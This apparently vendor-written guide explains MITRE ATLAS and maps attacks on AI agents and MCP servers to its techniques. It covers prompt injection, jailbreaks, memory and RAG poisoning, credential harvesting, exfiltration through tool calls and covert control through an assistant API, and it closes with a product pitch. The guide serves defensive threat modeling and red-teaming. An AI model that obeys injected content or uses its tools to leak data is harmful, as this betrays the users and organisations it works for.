MITRE ATLAS for Agentic AI: Mapping Agent and MCP Attacks to the Matrix (2026)
- MITRE ATLAS is a free, community-driven knowledge base of adversary tactics and techniques against AI/ML systems, structured like MITRE ATT&CK: Tactics > Techniques/sub-techniques > Mitigations + Case Studies.
- As of the v5.x releases (late 2025 into 2026) it spans roughly 16 tactics and ~84 techniques, including two AI-specific tactics - AI Model Access and AI Attack Staging - plus a Command and Control tactic added in the November 2025 v5.1.0 release.
- The October 2025 Zenity Labs collaboration added 14 agent-focused techniques covering context/memory poisoning, agent configuration tampering, credential harvesting, and Exfiltration via AI Agent Tool Invocation (
AML.T0086). - ATLAS is the threat side of the house, not the control side - it pairs with NIST AI RMF, OWASP LLM Top 10, and ISO 42001 rather than replacing them.
- Operationalizing ATLAS for agents requires an inventory of every agent and MCP server first, because most Discovery, Credential Access, and Exfiltration techniques assume you already know what exists.
- There is no MCP-named technique yet; MCP risk is covered implicitly through AI Agent Tools, Tool Definitions, and AI Agent Tool Invocation.
MITRE ATLAS is the closest thing the industry has to a shared vocabulary for how adversaries attack AI systems. It is a free, living knowledge base of adversary tactics, techniques, and procedures (TTPs) against AI and machine-learning systems, published by MITRE and built with a community of industry, government, and academic contributors. If you already speak MITRE ATT&CK, you can read ATLAS on day one: it borrows the same matrix structure, the same lifecycle framing, and even most of the same tactic names.
What makes ATLAS urgent in 2026 is its expansion into agentic AI. Through late 2025, ATLAS added a wave of techniques aimed squarely at autonomous agents and the tools they call - context and memory poisoning, agent configuration tampering, credential harvesting, and exfiltration through tool invocation. For any team running AI coding agents, internal copilots, or MCP servers, ATLAS is now the reference that names the attacks you are actually exposed to. This guide walks the framework's real structure, maps it to agent and MCP threats, and shows how a security team operationalizes it.
What MITRE ATLAS is
ATLAS stands for Adversarial Threat Landscape for Artificial-Intelligence Systems. It launched in 2021 and is maintained at atlas.mitre.org as a community-driven, freely available resource. MITRE is a US not-for-profit that also stewards ATT&CK and the CVE program, so ATLAS inherits a credible, vendor-neutral lineage. It is not a standard you certify against and not a control catalog. It is a knowledge base of how AI systems get attacked, intended for threat modeling, red-teaming, and detection engineering.
The defining design choice is that ATLAS is modeled on ATT&CK. That means it is a matrix: columns are Tactics (the adversary's goal), and each column is populated with Techniques and sub-techniques (how the goal is achieved), supported by Mitigations and real-world Case Studies. The tactics are laid out along an attacker lifecycle - reconnaissance through impact - but adversaries can use them in any order or simultaneously. The lifecycle is a reading aid, not a script.
The ATLAS taxonomy in 2026
As of the v5.x releases (the major agentic expansion landed in v5.1.0 in November 2025), ATLAS spans roughly 16 tactics and about 84 techniques, with around 56 sub-techniques, roughly 32 mitigations, and 40-plus case studies. Because it is a living resource, these counts shift release to release - treat them as approximate, not authoritative.
Most tactics are inherited or adapted directly from ATT&CK. Two are AI/ML-specific and are what set ATLAS apart: AI Model Access (gaining access to the model itself, via inference API, the surrounding application, or model artifacts) and AI Attack Staging (preparing an attack against the model - crafting adversarial examples, building surrogate models, poisoning data, inserting backdoors). ATLAS recently renamed many of its older ML labels to AI, so you will see both in older write-ups. A Command and Control tactic was added in the November 2025 release to capture covert control channels, including AI-service-based C2 - exemplified by the SesameOp case study, which abused an LLM provider's assistant API as a covert backdoor.
The tactic set
| Tactic | Origin | Adversary goal |
|---|---|---|
| Reconnaissance | From ATT&CK | Gather information on the AI system, architecture, data sources, and APIs |
| Resource Development | From ATT&CK | Acquire or poison datasets, obtain models and GenAI tools, build infrastructure |
| Initial Access | From ATT&CK | Gain a foothold via malicious APIs, phishing, vulnerabilities, or a compromised ML supply chain |
| AI Model Access | AI-specific | Reach the target model via inference API, the app, or direct artifact access |
| Execution | From ATT&CK | Run adversary-controlled behavior via malicious prompts, unsafe tools, or code paths |
| Persistence | From ATT&CK | Maintain a foothold via poisoned data, backdoored models, or memory manipulation |
| Privilege Escalation | From ATT&CK | Gain higher permissions, e.g. abusing over-permissioned agents or escaping sandboxes |
| Defense Evasion | From ATT&CK | Evade guardrails and filters via prompt obfuscation and anomaly evasion |
| Credential Access | From ATT&CK | Steal credentials from RAG databases or AI agent configuration |
| Discovery | From ATT&CK | Enumerate model info, agent configuration, tools, data sources, and triggers |
| Lateral Movement | From ATT&CK | Pivot through systems reachable from the AI or agent |
| Collection | From ATT&CK | Gather data from AI services, RAG databases, and org documents |
| AI Attack Staging | AI-specific | Prepare the model attack: adversarial examples, proxy models, backdoors |
| Command and Control | From ATT&CK (added Nov 2025) | Covert control channels, including AI-service-based C2 |
| Exfiltration | From ATT&CK | Steal data or model assets, including via agent tool invocation |
| Impact | From ATT&CK | Degrade availability, manipulate outputs, erode integrity, cause harm |
One trap worth flagging: the internal tactic IDs (the AML.TAxxxx numbers) are not in display order. They were assigned in a different sequence than the matrix presents them. Always map your controls and detections to tactics and techniques by name, not by ID number, or you will end up cross-referencing the wrong column.
The generative-AI and agentic techniques that matter
ATLAS now carries a substantial set of GenAI techniques that map cleanly onto LLM-backed applications:
- LLM Prompt Injection (
AML.T0051), split into Direct (AML.T0051.000) and Indirect (AML.T0051.001). - LLM Jailbreak (
AML.T0054) - bypassing guardrails so the model acts outside policy. - LLM Data Leakage (
AML.T0057) and Extract LLM System Prompt (AML.T0056). - RAG Poisoning (
AML.T0070), Retrieval Content Crafting (AML.T0066), and LLM Prompt Crafting (AML.T0065).
The October 21, 2025 collaboration between Zenity Labs and MITRE ATLAS added 14 agent-focused techniques and sub-techniques. These are the entries that turn ATLAS from an ML-research framework into something directly usable for agent fleets: AI Agent Context Poisoning, Memory manipulation, Thread injection, Modify AI Agent Configuration, RAG Credential Harvesting, Credentials from AI Agent Configuration, Discover AI Agent Configuration, Embedded Knowledge, Tool Definitions, Activation Triggers, Data from AI Services, RAG Databases, AI Agent Tools, and Exfiltration via AI Agent Tool Invocation (AML.T0086). The hinge technique is AI Agent Tool Invocation (AML.T0053): an agent leveraging its integrated tools is exactly the surface an attacker steers when they win control of the agent's context, and AML.T0086 is the matching Exfiltration technique when those outbound tool calls are used to leak data.
Mapping ATLAS to AI agent and MCP attacks
Agents and MCP servers are where ATLAS gets concrete. An agent is, by design, a system that reads untrusted input and takes real actions through tools - which collapses several tactics into a single workflow. The table below maps the agentic risks we see in the field to ATLAS techniques and to what a security team should watch.
| Agentic / MCP risk | ATLAS tactic → technique | What to monitor |
|---|---|---|
| Over-permissioned agent abused to take action | Execution / Privilege Escalation → AI Agent Tool Invocation (AML.T0053) | Which tools each agent can call, and anomalous tool-call patterns |
| Indirect prompt injection via ingested data | Execution → LLM Prompt Injection Indirect (T0051.001) + Retrieval Content Crafting (T0066) + RAG Poisoning (T0070) | Behavioral deviations after the agent reads external content |
| Direct prompt injection / jailbreak | Execution / Defense Evasion → T0051.000, LLM Jailbreak (T0054) | Out-of-policy actions and guardrail-bypass attempts |
| Persistent agent compromise | Persistence → Context Poisoning, Memory, Thread injection, Prompt Self-Replication (T0061) | Drift in agent behavior over time, via an audit trail |
| Shadow agents and shadow MCP servers | Discovery → Discover AI Agent Configuration, Tool Definitions, Embedded Knowledge, Activation Triggers | A current inventory of every agent and MCP server on the fleet |
| Secrets held in agent or tool config | Credential Access → Credentials from AI Agent Configuration, RAG Credential Harvesting | Agents holding or exposing tool/service API keys |
| Sensitive data exposure | Collection / Exfiltration → LLM Data Leakage (T0057), Extract System Prompt (T0056), Data from AI Services, RAG Databases | Data-exposure events and access to sensitive sources |
| Agent used as an exfiltration channel | Exfiltration → Exfiltration via AI Agent Tool Invocation (AML.T0086) | Outbound tool calls to unexpected destinations |
| Unvetted or malicious MCP server | Initial Access (ML supply chain) / Resource Development / AI Model Access | New, unknown, or unapproved MCP servers appearing on endpoints |
| Covert control via an AI service | Command and Control → SesameOp-style abuse of provider assistant APIs | Agent and MCP traffic to provider control-plane endpoints |
Two gaps are worth naming honestly. First, there is no MCP-named technique in ATLAS as of this writing. The Model Context Protocol risk surface is covered implicitly through AI Agent Tools, Tool Definitions, and Tool Invocation. That is a reasonable abstraction - MCP is one transport for agent tools - but it means an "unvetted MCP server" finding doesn't have a single canonical technique to file under. For deeper treatment of that surface, see our MCP server security guide and our analysis of MCP tool poisoning campaigns.
Second, ATLAS is threat-side only. It tells you what adversaries do; it provides no audit-trail control, no inventory mechanism, and no enforcement of its own. That is by design - it is the complement to control frameworks, not a substitute for them. The full indirect-injection chain (poisoned content → context poisoning → tool invocation → exfiltration) is the canonical multi-stage agent attack; we walk a worked example in our writeup on multi-agent prompt injection and credential theft.
How a security team operationalizes ATLAS
ATLAS is most useful as a coverage map, not a checklist. A practical adoption path for agentic environments looks like this:
- Inventory first. Most Discovery, Credential Access, and Exfiltration techniques assume you already know which agents and MCP servers exist. Build that inventory before anything else - you cannot threat-model assets you cannot see.
- Scope the matrix. You will not be exposed to every technique. Mark which tactics are reachable given your architecture (RAG? autonomous tool use? memory? external MCP servers?) and drop the rest.
- Map detections to techniques by name. For each in-scope technique, ask three questions: is it reachable, is it detectable, is it mitigated? Tag detections and alerts with the technique name and ID so reports trace back to known adversary behavior.
- Anchor red-teaming on ATLAS. Use the technique list to design AI red-team exercises - attempt direct and indirect prompt injection, attempt to read agent configuration, attempt exfiltration via a tool call - and record results against the matrix.
- Cross-walk to your control frameworks. ATLAS techniques map cleanly to the OWASP LLM Top 10, NIST AI RMF, and ISO 42001. Maintain that crosswalk so a single finding feeds both your threat model and your governance reporting.
For organizations standardizing on AI coding assistants, the same matrix drives concrete policy. Direct and indirect prompt injection, credential harvesting from config files, and tool invocation are everyday risks for CLIs and IDE agents - see securing AI coding agents and CLIs and governing AI coding assistants across your fleet for how those map to day-to-day controls.
Where continuous agent and MCP visibility fits
Walk the agentic rows of the mapping table and a pattern emerges: nearly every detection presupposes that you already know what agents and MCP servers exist, what tools they can call, and what they normally do. The Discovery tactic - Discover AI Agent Configuration, Tool Definitions, Activation Triggers - is literally the adversary doing reconnaissance on assets most organizations have never inventoried. If the attacker can enumerate your agents and you cannot, the asymmetry is already lost.
This is the layer continuous agent and MCP visibility addresses, and it is the category Anomity works in. Discovering and inventorying every AI agent and MCP server on the fleet is the control that answers the Discovery tactic and the "unvetted MCP server" gap ATLAS only covers implicitly. Monitoring agent permissions and tool definitions maps to Credential Access and AI Agent Tool Invocation. Behavioral anomaly alerts surface the indirect-injection chain, and a per-agent audit trail is the evidence layer that lets a SOC attribute observed behavior to a specific ATLAS technique or case study - something the framework, being threat-side, deliberately leaves to tooling. ATLAS names the threats; visibility is what makes them detectable in your environment.
If your agent estate has grown faster than your inventory - the common case - the practical starting point is the same as step one above: find out what is actually running. Our field notes on what we find when we scan AI agent configs and why AI agents and MCP servers are the new shadow IT cover what that discovery surfaces in practice.
Bottom line
MITRE ATLAS has matured from an ML-research curiosity into the de facto threat reference for AI systems, and its 2025-2026 agentic expansion makes it directly relevant to anyone running agents or MCP servers. Use it as your shared language for AI threats, cross-walk it to your control frameworks rather than treating it as one, and remember its core assumption: you can only map, detect, and mitigate the agents you can see. Inventory and visibility come first; the matrix does the rest.
Frequently asked questions
What is MITRE ATLAS?
MITRE ATLAS (Adversarial Threat Landscape for Artificial-Intelligence Systems) is a free, living knowledge base of adversary tactics, techniques, and procedures against AI and machine-learning systems. It is published by MITRE and built with a community of industry, government, and academic contributors. Launched in 2021, it is deliberately modeled on MITRE ATT&CK and available at atlas.mitre.org.
How is MITRE ATLAS different from MITRE ATT&CK?
ATLAS reuses ATT&CK's matrix structure (Tactics > Techniques > Mitigations + Case Studies) but focuses on AI/ML systems. Most tactics are inherited from ATT&CK, but two are AI-specific: AI Model Access and AI Attack Staging. ATLAS also adds AI-native techniques such as prompt injection, jailbreaks, RAG poisoning, and agent tool invocation that have no equivalent in classic ATT&CK.
How many tactics and techniques are in MITRE ATLAS?
As of the v5.x releases in late 2025 and 2026, ATLAS spans roughly 16 tactics and about 84 techniques (with around 56 sub-techniques), about 32 mitigations, and 40-plus real-world case studies. Because ATLAS is a living resource, exact counts shift from release to release, so treat these as approximate.
Does MITRE ATLAS cover AI agents and MCP servers?
Yes, increasingly so. The October 2025 Zenity Labs collaboration added 14 agent-focused techniques covering context and memory poisoning, agent configuration tampering, credential harvesting, tool discovery, and exfiltration via tool invocation. There is no technique named for the Model Context Protocol specifically; MCP risk is covered implicitly through AI Agent Tools, Tool Definitions, and AI Agent Tool Invocation.
What is AI Agent Tool Invocation in ATLAS?
AI Agent Tool Invocation (AML.T0053) describes an adversary using access to an agent to make it invoke the tools it is connected to. It maps to the Execution and Privilege Escalation tactics and is the core agentic risk surface: an attacker who steers an over-permissioned agent can make it invoke real tools and APIs. A related but distinct technique, Exfiltration via AI Agent Tool Invocation (AML.T0086), covers using the agent's outbound tool calls as a data-exfiltration channel.
Does MITRE ATLAS replace NIST AI RMF or OWASP LLM Top 10?
No. ATLAS is threat-side: it catalogs how adversaries attack AI systems. NIST AI RMF and ISO 42001 are control- and governance-side frameworks, and the OWASP LLM Top 10 is a risk list. They are complementary, and ATLAS techniques are widely cross-walked to all three for threat modeling and red-teaming.
How do I use MITRE ATLAS for AI red teaming?
Use the matrix as a coverage map. Build an inventory of your AI systems, agents, and MCP servers, then walk each ATLAS tactic and ask whether the relevant techniques are reachable, detectable, and mitigated in your environment. Map findings to specific technique IDs and case studies so detections and reports are traceable to known adversary behavior.
